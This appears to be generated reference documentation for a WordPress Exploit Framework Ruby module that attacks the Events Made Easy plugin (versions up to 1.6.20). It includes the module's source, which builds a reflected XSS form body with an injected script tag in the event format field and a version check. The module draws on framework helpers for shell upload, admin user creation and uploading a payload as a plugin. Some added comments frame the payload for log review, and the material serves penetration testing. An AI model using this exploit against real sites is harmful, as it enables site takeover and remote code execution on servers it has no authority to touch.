Class: Wpxf::Exploit::EventsMadeEasyReflectedXssShellUpload

Inherits:
Module
  • Object
Includes:
WordPress::StagedReflectedXss
Defined in:
lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary

Methods included from WordPress::StagedReflectedXss

#create_basic_post_script, #initial_req_path, #on_http_request, #run, #url_with_xss

Methods included from WordPress::ReflectedXss

#run

Methods included from WordPress::Xss

#on_http_request, #upload_shell, #wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script

Methods included from WordPress::Plugin

#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute, #upload_payload_using_plugin_form

Methods included from Net::HttpServer

#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #on_http_request, #start_http_server, #stop_http_server

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #run, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initialize ⇒ EventsMadeEasyReflectedXssShellUpload

Returns a new instance of EventsMadeEasyReflectedXssShellUpload.



# File 'lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb', line 6

# Sets up the module: records its metadata and declares the single
# module-specific option, `event_id`.
#
# The metadata names the affected plugin range (<= 1.6.20), the people
# credited, and two references (a WPVDB entry and the public advisory).
#
# NOTE(review): 'MAde' in the name string looks like a typo for 'Made'. It is
# a runtime string, so it is reproduced unchanged here.
def initialize
  super

  credits = [
    'Job Diesveld', # Discovery
    'rastating'     # WPXF module
  ]
  advisories = [
    ['WPVDB', '8595'],
    ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_events_made_easy_wordpress_plugin.html']
  ]

  update_info(
    name: 'Events MAde Easy <= 1.6.20 Reflected XSS Shell Upload',
    author: credits,
    references: advisories,
    date: 'Aug 04 2016'
  )

  # The option is declared as required and integer-typed, so the module
  # cannot be run without an event ID being supplied.
  event_id_option = IntegerOption.new(
    name: 'event_id',
    desc: 'A valid event ID (can be found in the URL of an event page)',
    required: true
  )
  register_option(event_id_option)
end

Instance Method Details

#check ⇒ Object



# File 'lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb', line 31

# Version check for the Events Made Easy plugin.
#
# Delegates to check_plugin_version_from_readme with the plugin slug and the
# version string '1.6.21'. Presumably '1.6.21' is the first fixed release
# (the module name says "<= 1.6.20") -- confirm against the helper's
# contract.
#
# @return [Object] whatever check_plugin_version_from_readme returns
def check
  plugin_slug = 'events-made-easy'
  boundary_version = '1.6.21'
  check_plugin_version_from_readme(plugin_slug, boundary_version)
end

#event_id ⇒ Object



# File 'lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb', line 35

# Reads the operator-supplied `event_id` option.
#
# @return [Object] the result of normalized_option_value('event_id');
#   presumably an Integer because the option is registered as an
#   IntegerOption -- verify against the Options mixin
def event_id
  option_name = 'event_id'
  normalized_option_value(option_name)
end

#form_fields ⇒ Object



# File 'lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb', line 47

# Builds the field set for the plugin's event-update form.
#
# Most values are constants, empty strings, or random filler generated per
# call. The one field that carries markup is 'event_single_event_format': a
# script element wrapping the output of xss_ascii_encoded_include_script.
# For anyone reviewing request logs or writing a filter rule, that field is
# the distinguishing part of this form body.
#
# Key order and the order of the random/time calls follow the original
# listing exactly.
#
# @return [Hash{String => Object}] field name => value
def form_fields
  # Small local shorthands; each call still hits the underlying helper once,
  # in the same position as before.
  alnum  = ->(len) { Utility::Text.rand_alphanumeric(len) }
  digits = ->(len) { Utility::Text.rand_numeric(len) }
  stamp  = ->(pattern) { Time.now.strftime(pattern) }

  localised_date = '%d/%m/%Y'
  iso_date       = '%Y-%m-%d'
  clock_time     = '%I:%M%p'

  {
    # -- status, pricing and RSVP limits --
    'event_status' => [1, 2, 5].sample,
    'event_contactperson_id' => -1,
    'event_seats' => 0,
    'price' => 0,
    'currency' => 'EUR',
    'eme_prop_max_allowed' => digits.call(2),
    'eme_prop_min_allowed' => digits.call(1),
    'eme_prop_rsvp_discount' => '',
    'eme_prop_rsvp_discountgroup' => '',
    'rsvp_number_days' => digits.call(1),
    'rsvp_number_hours' => digits.call(1),
    'eme_prop_rsvp_end_target' => 'start',

    # -- naming --
    'event_name' => alnum.call(10),
    'event_slug' => alnum.call(10),

    # -- recurrence and schedule, all stamped with the current time --
    'localised_recurrence_date' => stamp.call(localised_date),
    'recurrence_start_date' => stamp.call(iso_date),
    'localised_recurrence_end_date' => stamp.call(localised_date),
    'recurrence_end_date' => stamp.call(iso_date),
    'recurrence_freq' => %w[daily weekly monthly].sample,
    'recurrence_interval' => '',
    'recurrence_byweekno' => 1,
    'recurrence_byday' => 1,
    'localised_event_start_date' => stamp.call(localised_date),
    'event_start_date' => stamp.call(iso_date),
    'localised_event_end_date' => stamp.call(localised_date),
    'event_end_date' => stamp.call(iso_date),
    'event_start_time' => stamp.call(clock_time),
    'event_end_time' => stamp.call(clock_time),

    # -- display and e-mail templates --
    'eme_prop_event_page_title_format_tpl' => 0,
    'event_page_title_format' => alnum.call(10),
    'eme_prop_event_single_event_format_tpl' => 0,
    # The only value containing markup; the closing tag is written with an
    # escaped slash exactly as in the original string.
    'event_single_event_format' => "<script>#{xss_ascii_encoded_include_script}<\\/script>",
    'eme_prop_event_contactperson_email_body_tpl' => 0,
    'event_contactperson_email_body' => '',
    'eme_prop_event_registration_recorded_ok_html_tpl' => 0,
    'event_registration_recorded_ok_html' => '',
    'eme_prop_event_respondent_email_body_tpl' => 0,
    'event_respondent_email_body' => '',
    'eme_prop_event_registration_pending_email_body_tpl' => 0,
    'event_registration_pending_email_body' => '',
    'eme_prop_event_registration_updated_email_body_tpl' => 0,
    'event_registration_updated_email_body' => '',
    'eme_prop_event_registration_cancelled_email_body_tpl' => 0,
    'event_registration_cancelled_email_body' => alnum.call(10),
    'eme_prop_event_registration_denied_email_body_tpl' => 0,
    'event_registration_denied_email_body' => alnum.call(10),
    'eme_prop_event_registration_form_format_tpl' => 0,
    'event_registration_form_format' => '',
    'eme_prop_event_cancel_form_format_tpl' => 0,
    'event_cancel_form_format' => '',

    # -- location and remaining content --
    'location_name' => alnum.call(5),
    'location_address' => alnum.call(5),
    'location_town' => alnum.call(5),
    'location_latitude' => '',
    'location_longitude' => '',
    'content' => alnum.call(10),
    'event_image_url' => '',
    'event_image_id' => '',
    'event_url' => '',
    'event_update_button' => ''
  }
end

#initial_script ⇒ Object



# File 'lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb', line 43

# Produces the first-stage script by handing the update-event URL and the
# form field set to create_basic_post_script.
#
# @return [Object] whatever create_basic_post_script returns; presumably a
#   JavaScript string, judging by the helper's name -- verify against
#   WordPress::StagedReflectedXss
def initial_script
  post_target = vulnerable_url
  post_fields = form_fields
  create_basic_post_script(post_target, post_fields)
end

#vulnerable_url ⇒ Object



# File 'lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb', line 39

# Builds the address of the plugin's event-update admin action for the
# configured event.
#
# The path is admin.php with page=events-manager,
# eme_admin_action=update_event and the event ID, joined onto the WordPress
# admin base via normalize_uri. The same action name is what an
# administrator would look for in access logs when reviewing activity
# against this endpoint.
#
# @return [Object] the result of normalize_uri for the two parts
def vulnerable_url
  admin_base = wordpress_url_admin
  action_path = "admin.php?page=events-manager&eme_admin_action=update_event&event_id=#{event_id}"
  normalize_uri(admin_base, action_path)
end